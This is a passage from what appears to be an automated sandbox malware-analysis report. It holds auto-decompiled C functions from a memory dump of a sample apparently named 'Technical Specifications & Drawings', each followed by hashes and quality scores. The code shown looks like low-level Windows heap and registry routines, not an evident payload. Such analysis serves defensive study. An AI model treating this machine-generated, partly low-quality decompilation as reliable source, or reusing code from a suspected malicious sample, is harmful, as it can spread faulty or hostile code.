                                                  											__eflags = _t193;
                                                  											if(_t193 < 0) {
                                                  												E017E37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                  												__eflags =  *((char*)(_t237 - 0x39));
                                                  												if( *((char*)(_t237 - 0x39)) != 0) {
                                                  													 *0x1897b10 =  *0x1897b10 - 8;
                                                  												}
                                                  											} else {
                                                  												_t169 =  *(_t237 - 0x68);
                                                  												__eflags = _t169;
                                                  												if(_t169 != 0) {
                                                  													 *0x1897b04 =  *0x1897b04 - _t169;
                                                  												}
                                                  											}
                                                  											__eflags = _t193;
                                                  											if(_t193 >= 0) {
                                                  												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                  											}
                                                  											goto L30;
                                                  										}
                                                  										_t226 = _t206 * 0xc;
                                                  										__eflags = _t226;
                                                  										_t194 =  *(_t237 - 0x48);
                                                  										do {
                                                  											 *(_t237 - 0x40) = _t206 - 1;
                                                  											_t226 = _t226 - 0xc;
                                                  											 *(_t237 - 0x4c) = _t226;
                                                  											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                  											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                  												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                  												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                  													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                  													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                  													__eflags =  *((char*)(_t237 - 0x39));
                                                  													if( *((char*)(_t237 - 0x39)) == 0) {
                                                  														_t171 = _t210;
                                                  													} else {
                                                  														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                  														L017C77F0(_t194, _t236, _t210 - 8);
                                                  														_t171 =  *(_t237 - 0x50);
                                                  													}
                                                  													L48:
                                                  													L017C77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                  													L46:
                                                  													_t206 =  *(_t237 - 0x40);
                                                  													_t226 =  *(_t237 - 0x4c);
                                                  													goto L24;
                                                  												}
                                                  												 *0x1897b08 =  *0x1897b08 + 1;
                                                  												goto L24;
                                                  											}
                                                  											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                  											__eflags = _t171;
                                                  											if(_t171 != 0) {
                                                  												__eflags =  *((char*)(_t237 - 0x39));
                                                  												if( *((char*)(_t237 - 0x39)) == 0) {
                                                  													goto L48;
                                                  												}
                                                  												E017E57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                  												goto L46;
                                                  											}
                                                  											L24:
                                                  											__eflags = _t206;
                                                  										} while (_t206 != 0);
                                                  										_t193 =  *(_t237 - 0x44);
                                                  										goto L26;
                                                  									}
                                                  									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                  									 *(_t237 - 0x7c) = _t232;
                                                  									 *(_t232 - 4) = _t214;
                                                  									 *(_t237 - 4) = _t236;
                                                  									E017EF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                  									_t238 = _t238 + 0xc;
                                                  									 *(_t237 - 4) = 0xfffffffe;
                                                  									_t215 =  *(_t237 - 0x48);
                                                  									__eflags = _t193;
                                                  									if(_t193 < 0) {
                                                  										L017C77F0(_t215, _t236,  *(_t237 - 0x78));
                                                  										goto L20;
                                                  									}
                                                  									__eflags =  *((char*)(_t237 - 0x39));
                                                  									if( *((char*)(_t237 - 0x39)) != 0) {
                                                  										_t233 = E017DA44B( *(_t237 - 0x4c));
                                                  										 *(_t237 - 0x50) = _t233;
                                                  										__eflags = _t233;
                                                  										if(_t233 == 0) {
                                                  											L017C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                  											goto L52;
                                                  										}
                                                  										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                  										L17:
                                                  										_t234 =  *(_t237 - 0x40);
                                                  										_t218 = _t234 * 0xc;
                                                  										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                  										 *(_t218 + _t235 + 0x10) = _t236;
                                                  										_t224 = _t234 + 1;
                                                  										 *(_t237 - 0x40) = _t224;
                                                  										 *(_t237 - 0x50) = _t224;
                                                  										_t193 =  *(_t237 - 0x44);
                                                  										continue;
                                                  									}
                                                  									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                  									goto L17;
                                                  								}
                                                  								 *_t235 = _t236;
                                                  								_t165 = 0x10 + _t163 * 0xc;
                                                  								__eflags = _t165;
                                                  								_push(_t165);
                                                  								_push(_t235);
                                                  								_push(0x23);
                                                  								_push(0xffffffff);
                                                  								_t193 = E017E96C0();
                                                  								goto L19;
                                                  							} else {
                                                  								goto L50;
                                                  							}
                                                  						}
                                                  						_t235 = _t237 - 0x38;
                                                  						 *(_t237 - 0x60) = _t235;
                                                  						goto L8;
                                                  					}
                                                  					goto L4;
                                                  				}
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af2a94cfe06781d6fddf28bbd10b66d0ab39ea1f06173b8651e9a36fd36f58d4
                                                  • Instruction ID: 2f4241686d310aef5af1e810deda654aa85fd0930daf801a36544a18a9b0648f
                                                  • Opcode Fuzzy Hash: af2a94cfe06781d6fddf28bbd10b66d0ab39ea1f06173b8651e9a36fd36f58d4
                                                  • Instruction Fuzzy Hash: 4EB13970E0020ADFDB25DF99C998BEDFBB9BF48308F144129E505AB24ADB70A945CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E017AC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                  				signed int _v8;
                                                  				char _v1036;
                                                  				signed int _v1040;
                                                  				char _v1048;
                                                  				signed int _v1052;
                                                  				signed char _v1056;
                                                  				void* _v1058;
                                                  				char _v1060;
                                                  				signed int _v1064;
                                                  				void* _v1068;
                                                  				intOrPtr _v1072;
                                                  				void* _v1084;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				intOrPtr _t70;
                                                  				intOrPtr _t72;
                                                  				signed int _t74;
                                                  				intOrPtr _t77;
                                                  				signed int _t78;
                                                  				signed int _t81;
                                                  				void* _t101;
                                                  				signed int _t102;
                                                  				signed int _t107;
                                                  				signed int _t109;
                                                  				signed int _t110;
                                                  				signed char _t111;
                                                  				signed int _t112;
                                                  				signed int _t113;
                                                  				signed int _t114;
                                                  				intOrPtr _t116;
                                                  				void* _t117;
                                                  				char _t118;
                                                  				void* _t120;
                                                  				char _t121;
                                                  				signed int _t122;
                                                  				signed int _t123;
                                                  				signed int _t125;
                                                  
                                                  				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                  				_v8 =  *0x189d360 ^ _t125;
                                                  				_t116 = _a4;
                                                  				_v1056 = _a16;
                                                  				_v1040 = _a24;
                                                  				if(E017B6D30( &_v1048, _a8) < 0) {
                                                  					L4:
                                                  					_pop(_t117);
                                                  					_pop(_t120);
                                                  					_pop(_t101);
                                                  					return E017EB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                  				}
                                                  				_t70 = _a20;
                                                  				if(_t70 >= 0x3f4) {
                                                  					_t121 = _t70 + 0xc;
                                                  					L19:
                                                  					_t107 =  *( *[fs:0x30] + 0x18);
                                                  					__eflags = _t107;
                                                  					if(_t107 == 0) {
                                                  						L60:
                                                  						_t68 = 0xc0000017;
                                                  						goto L4;
                                                  					}
                                                  					_t72 =  *0x1897b9c; // 0x0
                                                  					_t74 = L017C4620(_t107, _t107, _t72 + 0x180000, _t121);
                                                  					_v1064 = _t74;
                                                  					__eflags = _t74;
                                                  					if(_t74 == 0) {
                                                  						goto L60;
                                                  					}
                                                  					_t102 = _t74;
                                                  					_push( &_v1060);
                                                  					_push(_t121);
                                                  					_push(_t74);
                                                  					_push(2);
                                                  					_push( &_v1048);
                                                  					_push(_t116);
                                                  					_t122 = E017E9650();
                                                  					__eflags = _t122;
                                                  					if(_t122 >= 0) {
                                                  						L7:
                                                  						_t114 = _a12;
                                                  						__eflags = _t114;
                                                  						if(_t114 != 0) {
                                                  							_t77 = _a20;
                                                  							L26:
                                                  							_t109 =  *(_t102 + 4);
                                                  							__eflags = _t109 - 3;
                                                  							if(_t109 == 3) {
                                                  								L55:
                                                  								__eflags = _t114 - _t109;
                                                  								if(_t114 != _t109) {
                                                  									L59:
                                                  									_t122 = 0xc0000024;
                                                  									L15:
                                                  									_t78 = _v1052;
                                                  									__eflags = _t78;
                                                  									if(_t78 != 0) {
                                                  										L017C77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                  									}
                                                  									_t68 = _t122;
                                                  									goto L4;
                                                  								}
                                                  								_t110 = _v1056;
                                                  								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                  								_v1060 = _t118;
                                                  								__eflags = _t110;
                                                  								if(_t110 == 0) {
                                                  									L10:
                                                  									_t122 = 0x80000005;
                                                  									L11:
                                                  									_t81 = _v1040;
                                                  									__eflags = _t81;
                                                  									if(_t81 == 0) {
                                                  										goto L15;
                                                  									}
                                                  									__eflags = _t122;
                                                  									if(_t122 >= 0) {
                                                  										L14:
                                                  										 *_t81 = _t118;
                                                  										goto L15;
                                                  									}
                                                  									__eflags = _t122 - 0x80000005;
                                                  									if(_t122 != 0x80000005) {
                                                  										goto L15;
                                                  									}
                                                  									goto L14;
                                                  								}
                                                  								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                  								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                  									goto L10;
                                                  								}
                                                  								_push( *((intOrPtr*)(_t102 + 8)));
                                                  								_t59 = _t102 + 0xc; // 0xc
                                                  								_push(_t110);
                                                  								L54:
                                                  								E017EF3E0();
                                                  								_t125 = _t125 + 0xc;
                                                  								goto L11;
                                                  							}
                                                  							__eflags = _t109 - 7;
                                                  							if(_t109 == 7) {
                                                  								goto L55;
                                                  							}
                                                  							_t118 = 4;
                                                  							__eflags = _t109 - _t118;
                                                  							if(_t109 != _t118) {
                                                  								__eflags = _t109 - 0xb;
                                                  								if(_t109 != 0xb) {
                                                  									__eflags = _t109 - 1;
                                                  									if(_t109 == 1) {
                                                  										__eflags = _t114 - _t118;
                                                  										if(_t114 != _t118) {
                                                  											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                  											_v1060 = _t118;
                                                  											__eflags = _t118 - _t77;
                                                  											if(_t118 > _t77) {
                                                  												goto L10;
                                                  											}
                                                  											_push(_t118);
                                                  											_t56 = _t102 + 0xc; // 0xc
                                                  											_push(_v1056);
                                                  											goto L54;
                                                  										}
                                                  										__eflags = _t77 - _t118;
                                                  										if(_t77 != _t118) {
                                                  											L34:
                                                  											_t122 = 0xc0000004;
                                                  											goto L15;
                                                  										}
                                                  										_t111 = _v1056;
                                                  										__eflags = _t111 & 0x00000003;
                                                  										if((_t111 & 0x00000003) == 0) {
                                                  											_v1060 = _t118;
                                                  											__eflags = _t111;
                                                  											if(__eflags == 0) {
                                                  												goto L10;
                                                  											}
                                                  											_t42 = _t102 + 0xc; // 0xc
                                                  											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                  											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                  											_push(_t111);
                                                  											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                  											_push(0);
                                                  											_push( &_v1048);
                                                  											_t122 = E017E13C0(_t102, _t118, _t122, __eflags);
                                                  											L44:
                                                  											_t118 = _v1072;
                                                  											goto L11;
                                                  										}
                                                  										_t122 = 0x80000002;
                                                  										goto L15;
                                                  									}
                                                  									_t122 = 0xc0000024;
                                                  									goto L44;
                                                  								}
                                                  								__eflags = _t114 - _t109;
                                                  								if(_t114 != _t109) {
                                                  									goto L59;
                                                  								}
                                                  								_t118 = 8;
                                                  								__eflags = _t77 - _t118;
                                                  								if(_t77 != _t118) {
                                                  									goto L34;
                                                  								}
                                                  								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                  								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                  									goto L34;
                                                  								}
                                                  								_t112 = _v1056;
                                                  								_v1060 = _t118;
                                                  								__eflags = _t112;
                                                  								if(_t112 == 0) {
                                                  									goto L10;
                                                  								}
                                                  								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                  								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                  								goto L11;
                                                  							}
                                                  							__eflags = _t114 - _t118;
                                                  							if(_t114 != _t118) {
                                                  								goto L59;
                                                  							}
                                                  							__eflags = _t77 - _t118;
                                                  							if(_t77 != _t118) {
                                                  								goto L34;
                                                  							}
                                                  							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                  							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                  								goto L34;
                                                  							}
                                                  							_t113 = _v1056;
                                                  							_v1060 = _t118;
                                                  							__eflags = _t113;
                                                  							if(_t113 == 0) {
                                                  								goto L10;
                                                  							}
                                                  							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                  							goto L11;
                                                  						}
                                                  						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                  						__eflags = _t118 - _a20;
                                                  						if(_t118 <= _a20) {
                                                  							_t114 =  *(_t102 + 4);
                                                  							_t77 = _t118;
                                                  							goto L26;
                                                  						}
                                                  						_v1060 = _t118;
                                                  						goto L10;
                                                  					}
                                                  					__eflags = _t122 - 0x80000005;
                                                  					if(_t122 != 0x80000005) {
                                                  						goto L15;
                                                  					}
                                                  					L017C77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                  					L18:
                                                  					_t121 = _v1060;
                                                  					goto L19;
                                                  				}
                                                  				_push( &_v1060);
                                                  				_push(0x400);
                                                  				_t102 =  &_v1036;
                                                  				_push(_t102);
                                                  				_push(2);
                                                  				_push( &_v1048);
                                                  				_push(_t116);
                                                  				_t122 = E017E9650();
                                                  				if(_t122 >= 0) {
                                                  					__eflags = 0;
                                                  					_v1052 = 0;
                                                  					goto L7;
                                                  				}
                                                  				if(_t122 == 0x80000005) {
                                                  					goto L18;
                                                  				}
                                                  				goto L4;
                                                  			}











































                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d61e1d7817bd969c73dc30fe6874e4f9c26745b56d90cad327e3cfe6ed483a5
                                                  • Instruction ID: 64457cfe60fd247fa28eabba3567e9a6e222e8a70f93bf9c087b198afa71ab58
                                                  • Opcode Fuzzy Hash: 3d61e1d7817bd969c73dc30fe6874e4f9c26745b56d90cad327e3cfe6ed483a5
                                                  • Instruction Fuzzy Hash: 3681B2776042069FDB26CE58C880E6AB7EDFB84354F14485EEE45DB249D730EE44CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E0183B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                  				char _v8;
                                                  				signed int _v12;
                                                  				signed int _t80;
                                                  				signed int _t83;
                                                  				intOrPtr _t89;
                                                  				signed int _t92;
                                                  				signed char _t106;
                                                  				signed int* _t107;
                                                  				intOrPtr _t108;
                                                  				intOrPtr _t109;
                                                  				signed int _t114;
                                                  				void* _t115;
                                                  				void* _t117;
                                                  				void* _t119;
                                                  				void* _t122;
                                                  				signed int _t123;
                                                  				signed int* _t124;
                                                  
                                                  				_t106 = _a12;
                                                  				if((_t106 & 0xfffffffc) != 0) {
                                                  					return 0xc000000d;
                                                  				}
                                                  				if((_t106 & 0x00000002) != 0) {
                                                  					_t106 = _t106 | 0x00000001;
                                                  				}
                                                  				_t109 =  *0x1897b9c; // 0x0
                                                  				_t124 = L017C4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                  				if(_t124 != 0) {
                                                  					 *_t124 =  *_t124 & 0x00000000;
                                                  					_t124[1] = _t124[1] & 0x00000000;
                                                  					_t124[4] = _t124[4] & 0x00000000;
                                                  					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                  						L13:
                                                  						_push(_t124);
                                                  						if((_t106 & 0x00000002) != 0) {
                                                  							_push(0x200);
                                                  							_push(0x28);
                                                  							_push(0xffffffff);
                                                  							_t122 = E017E9800();
                                                  							if(_t122 < 0) {
                                                  								L33:
                                                  								if((_t124[4] & 0x00000001) != 0) {
                                                  									_push(4);
                                                  									_t64 =  &(_t124[1]); // 0x4
                                                  									_t107 = _t64;
                                                  									_push(_t107);
                                                  									_push(5);
                                                  									_push(0xfffffffe);
                                                  									E017E95B0();
                                                  									if( *_t107 != 0) {
                                                  										_push( *_t107);
                                                  										E017E95D0();
                                                  									}
                                                  								}
                                                  								_push(_t124);
                                                  								_push(0);
                                                  								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                  								L37:
                                                  								L017C77F0();
                                                  								return _t122;
                                                  							}
                                                  							_t124[4] = _t124[4] | 0x00000002;
                                                  							L18:
                                                  							_t108 = _a8;
                                                  							_t29 =  &(_t124[0x105]); // 0x414
                                                  							_t80 = _t29;
                                                  							_t30 =  &(_t124[5]); // 0x14
                                                  							_t124[3] = _t80;
                                                  							_t123 = 0;
                                                  							_t124[2] = _t30;
                                                  							 *_t80 = _t108;
                                                  							if(_t108 == 0) {
                                                  								L21:
                                                  								_t112 = 0x400;
                                                  								_push( &_v8);
                                                  								_v8 = 0x400;
                                                  								_push(_t124[2]);
                                                  								_push(0x400);
                                                  								_push(_t124[3]);
                                                  								_push(0);
                                                  								_push( *_t124);
                                                  								_t122 = E017E9910();
                                                  								if(_t122 != 0xc0000023) {
                                                  									L26:
                                                  									if(_t122 != 0x106) {
                                                  										L40:
                                                  										if(_t122 < 0) {
                                                  											L29:
                                                  											_t83 = _t124[2];
                                                  											if(_t83 != 0) {
                                                  												_t59 =  &(_t124[5]); // 0x14
                                                  												if(_t83 != _t59) {
                                                  													L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                  												}
                                                  											}
                                                  											_push( *_t124);
                                                  											E017E95D0();
                                                  											goto L33;
                                                  										}
                                                  										 *_a16 = _t124;
                                                  										return 0;
                                                  									}
                                                  									if(_t108 != 1) {
                                                  										_t122 = 0;
                                                  										goto L40;
                                                  									}
                                                  									_t122 = 0xc0000061;
                                                  									goto L29;
                                                  								} else {
                                                  									goto L22;
                                                  								}
                                                  								while(1) {
                                                  									L22:
                                                  									_t89 =  *0x1897b9c; // 0x0
                                                  									_t92 = L017C4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                  									_t124[2] = _t92;
                                                  									if(_t92 == 0) {
                                                  										break;
                                                  									}
                                                  									_t112 =  &_v8;
                                                  									_push( &_v8);
                                                  									_push(_t92);
                                                  									_push(_v8);
                                                  									_push(_t124[3]);
                                                  									_push(0);
                                                  									_push( *_t124);
                                                  									_t122 = E017E9910();
                                                  									if(_t122 != 0xc0000023) {
                                                  										goto L26;
                                                  									}
                                                  									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                  								}
                                                  								_t122 = 0xc0000017;
                                                  								goto L26;
                                                  							}
                                                  							_t119 = 0;
                                                  							do {
                                                  								_t114 = _t124[3];
                                                  								_t119 = _t119 + 0xc;
                                                  								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                  								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                  								_t123 = _t123 + 1;
                                                  								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                  							} while (_t123 < _t108);
                                                  							goto L21;
                                                  						}
                                                  						_push(0x28);
                                                  						_push(3);
                                                  						_t122 = E017AA7B0();
                                                  						if(_t122 < 0) {
                                                  							goto L33;
                                                  						}
                                                  						_t124[4] = _t124[4] | 0x00000001;
                                                  						goto L18;
                                                  					}
                                                  					if((_t106 & 0x00000001) == 0) {
                                                  						_t115 = 0x28;
                                                  						_t122 = E0183E7D3(_t115, _t124);
                                                  						if(_t122 < 0) {
                                                  							L9:
                                                  							_push(_t124);
                                                  							_push(0);
                                                  							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                  							goto L37;
                                                  						}
                                                  						L12:
                                                  						if( *_t124 != 0) {
                                                  							goto L18;
                                                  						}
                                                  						goto L13;
                                                  					}
                                                  					_t15 =  &(_t124[1]); // 0x4
                                                  					_t117 = 4;
                                                  					_t122 = E0183E7D3(_t117, _t15);
                                                  					if(_t122 >= 0) {
                                                  						_t124[4] = _t124[4] | 0x00000001;
                                                  						_v12 = _v12 & 0x00000000;
                                                  						_push(4);
                                                  						_push( &_v12);
                                                  						_push(5);
                                                  						_push(0xfffffffe);
                                                  						E017E95B0();
                                                  						goto L12;
                                                  					}
                                                  					goto L9;
                                                  				} else {
                                                  					return 0xc0000017;
                                                  				}
                                                  			}





















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3cab9272fbb651ff2c8a5f438c5c82775a4c0344a2e2544bd82c4c93456d964e
                                                  • Instruction ID: 03f9e095ab6e467bcbb55af1a21a49035c9876f080ed0be26062567443c69ae5
                                                  • Opcode Fuzzy Hash: 3cab9272fbb651ff2c8a5f438c5c82775a4c0344a2e2544bd82c4c93456d964e
                                                  • Instruction Fuzzy Hash: D871F4B2200B06AFE731CF18C848F56BBE5EB84724F19452CE655D72A1EB75EA41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 79%
                                                  			E01826DC9(signed int __ecx, void* __edx) {
                                                  				unsigned int _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				char _v32;
                                                  				char _v36;
                                                  				char _v40;
                                                  				char _v44;
                                                  				char _v48;
                                                  				char _v52;
                                                  				char _v56;
                                                  				char _v60;
                                                  				void* _t87;
                                                  				void* _t95;
                                                  				signed char* _t96;
                                                  				signed int _t107;
                                                  				signed int _t136;
                                                  				signed char* _t137;
                                                  				void* _t157;
                                                  				void* _t161;
                                                  				void* _t167;
                                                  				intOrPtr _t168;
                                                  				void* _t174;
                                                  				void* _t175;
                                                  				signed int _t176;
                                                  				void* _t177;
                                                  
                                                  				_t136 = __ecx;
                                                  				_v44 = 0;
                                                  				_t167 = __edx;
                                                  				_v40 = 0;
                                                  				_v36 = 0;
                                                  				_v32 = 0;
                                                  				_v60 = 0;
                                                  				_v56 = 0;
                                                  				_v52 = 0;
                                                  				_v48 = 0;
                                                  				_v16 = __ecx;
                                                  				_t87 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                  				_t175 = _t87;
                                                  				if(_t175 != 0) {
                                                  					_t11 = _t175 + 0x30; // 0x30
                                                  					 *((short*)(_t175 + 6)) = 0x14d4;
                                                  					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                  					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                  					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                  					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                  					E01826B4C(_t167, _t11, 0x214,  &_v8);
                                                  					_v12 = _v8 + 0x10;
                                                  					_t95 = E017C7D50();
                                                  					_t137 = 0x7ffe0384;
                                                  					if(_t95 == 0) {
                                                  						_t96 = 0x7ffe0384;
                                                  					} else {
                                                  						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  					}
                                                  					_push(_t175);
                                                  					_push(_v12);
                                                  					_push(0x402);
                                                  					_push( *_t96 & 0x000000ff);
                                                  					E017E9AE0();
                                                  					_t87 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                  					_t176 = _v16;
                                                  					if((_t176 & 0x00000100) != 0) {
                                                  						_push( &_v36);
                                                  						_t157 = 4;
                                                  						_t87 = E0182795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                  						if(_t87 >= 0) {
                                                  							_v24 = E0182795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                  							_v28 = E0182795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                  							_push( &_v52);
                                                  							_t161 = 5;
                                                  							_t168 = E0182795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                  							_v20 = _t168;
                                                  							_t107 = L017C4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                  							_v16 = _t107;
                                                  							if(_t107 != 0) {
                                                  								_v8 = _v8 & 0x00000000;
                                                  								 *(_t107 + 0x20) = _t176;
                                                  								 *((short*)(_t107 + 6)) = 0x14d5;
                                                  								_t47 = _t107 + 0x24; // 0x24
                                                  								_t177 = _t47;
                                                  								E01826B4C( &_v36, _t177, 0xc78,  &_v8);
                                                  								_t51 = _v8 + 4; // 0x4
                                                  								_t178 = _t177 + (_v8 >> 1) * 2;
                                                  								_v12 = _t51;
                                                  								E01826B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                  								_v12 = _v12 + _v8;
                                                  								E01826B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                  								_t125 = _v8;
                                                  								_v12 = _v12 + _v8;
                                                  								E01826B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                  								_t174 = _v12 + _v8;
                                                  								if(E017C7D50() != 0) {
                                                  									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  								}
                                                  								_push(_v16);
                                                  								_push(_t174);
                                                  								_push(0x402);
                                                  								_push( *_t137 & 0x000000ff);
                                                  								E017E9AE0();
                                                  								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                  								_t168 = _v20;
                                                  							}
                                                  							_t87 = L017C2400( &_v36);
                                                  							if(_v24 >= 0) {
                                                  								_t87 = L017C2400( &_v44);
                                                  							}
                                                  							if(_t168 >= 0) {
                                                  								_t87 = L017C2400( &_v52);
                                                  							}
                                                  							if(_v28 >= 0) {
                                                  								return L017C2400( &_v60);
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t87;
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                  • Instruction ID: bcc9d13781c9e37037803d8dec71bd5dcee70aeb70e0322f68b21a54587bd468
                                                  • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                  • Instruction Fuzzy Hash: 51716E71A00619EFDB11DFA9C984EAEFBB9FF58710F104069E905E7250EB34EA41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E017A52A5(char __ecx) {
                                                  				char _v20;
                                                  				char _v28;
                                                  				char _v29;
                                                  				void* _v32;
                                                  				void* _v36;
                                                  				void* _v37;
